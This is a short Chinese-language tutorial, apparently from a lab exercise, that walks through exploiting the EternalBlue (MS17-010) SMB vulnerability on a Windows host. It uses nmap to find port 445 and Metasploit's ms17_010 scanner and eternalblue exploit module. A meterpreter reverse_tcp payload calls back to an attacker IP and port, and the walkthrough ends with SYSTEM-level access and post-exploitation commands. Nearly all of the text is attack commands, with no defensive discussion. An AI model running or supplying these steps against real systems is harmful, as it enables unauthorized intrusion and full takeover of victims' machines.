1. 探测目标主机系统及445端口是否开放
nmap -sV -T4 192.168.205.200
下图可以看到windos已开启445端口
2. 打开kali的渗透测试工具Metasploit
msfconsole
3. 搜索永恒之蓝漏洞名
search smb_ms17_010
使用此模块,并设置被攻击主机IP
use auxiliary/scanner/smb/smb_ms17_010 show options
设置被攻击的主机IP
set RHOSTS 192.168.205.200
4. 运行看是否存在永恒之蓝漏洞(下图显示目标主机存在此漏洞)
run
5. 使用攻击模块设置被攻击主机IP
use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.205.200
6. 设置攻击载荷(kali所在主机IP及监听端口
# 攻击载荷 set payload windows/x64/meterpreter/reverse_tcp # 攻击机IP(kali主机) set lhost 192.168.205.173 # 攻击机监听端口 set lport 6666 # 查看设置的参数 show options
7. 执行攻击命令(下图显示已经入侵到windows系统)
exploit
可以使用?查看帮助命令
sysinfo # 系统相关信息 getuid # 查看当前用户身份权限,下图可以看到已取得了系统级别权限
8. 可以使用像linux一样的命令查看,切换目录